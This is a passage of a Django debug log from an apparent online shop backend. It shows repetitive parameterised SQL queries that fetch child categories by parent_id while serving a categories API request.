"shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 12:47:40,489 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 12:47:40,491 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 12:47:40,494 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 12:47:40,497 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 12:47:40,499 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 12:47:40,503 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 12:47:40,506 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 12:47:40,510 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 12:47:40,513 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 12:47:40,516 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 12:47:40,521 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 12:47:40,524 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 12:47:40,526 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 12:47:40,529 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 12:47:40,532 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 12:47:40,536 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 12:47:40,539 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 12:47:40,541 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 12:47:40,543 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 12:47:40,545 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 12:47:40,548 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 12:47:40,551 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 12:47:40,554 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 12:47:40,556 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 12:47:40,558 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 12:47:40,560 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 12:47:40,564 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 12:47:40,566 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 12:47:40,568 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 12:47:40,570 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 12:47:40,573 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 12:47:40,577 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 12:47:40,579 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 12:47:40,581 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 12:47:40,583 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 12:47:40,585 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 12:47:40,587 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 12:47:40,590 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 12:47:40,593 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 12:47:40,595 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 12:47:40,598 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 12:47:40,600 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 12:47:40] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 12:47:41,994 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 12:47:42,001 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:47:42,005 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 12:47:42,007 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 12:47:42,011 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 12:47:42,013 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 12:47:42,015 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 12:47:42,017 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 12:47:42,019 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 12:47:42,023 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 12:47:42,025 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 12:47:42,027 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 12:47:42,030 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 12:47:42,032 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 12:47:42,035 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 12:47:42,038 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 12:47:42,040 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 12:47:42,042 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 12:47:42,045 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 12:47:42,048 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 12:47:42,050 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 12:47:42,053 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 12:47:42,055 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 12:47:42,057 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 12:47:42,059 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER 